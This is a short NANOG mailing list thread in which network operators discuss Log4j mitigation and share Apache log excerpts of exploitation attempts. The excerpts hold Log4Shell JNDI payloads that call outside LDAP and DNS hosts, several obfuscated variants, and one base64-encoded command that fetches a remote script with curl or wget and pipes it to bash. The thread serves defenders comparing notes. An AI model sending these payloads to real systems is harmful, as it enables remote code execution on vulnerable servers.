Log4j mitigation

Jean St-Laurent jean at ddostest.me
Mon Dec 13 11:46:44 UTC 2021


This should translate in a query from your infected server toward an infected server controlled by a malicious hacker on port 389.

x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}

Right?

Jean

-----Original Message-----
From: Jörg Kost <jk at ip-clear.de> 
Sent: December 13, 2021 6:40 AM
To: Jean St-Laurent <jean at ddostest.me>
Cc: Saku Ytti <saku at ytti.fi>; nanog at nanog.org
Subject: Re: Log4j mitigation

You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), in Headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will soon.

We are seeing things like this since 10th of Dec. And this is only a typical Apache Logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" 
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" 
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}




More information about the NANOG mailing list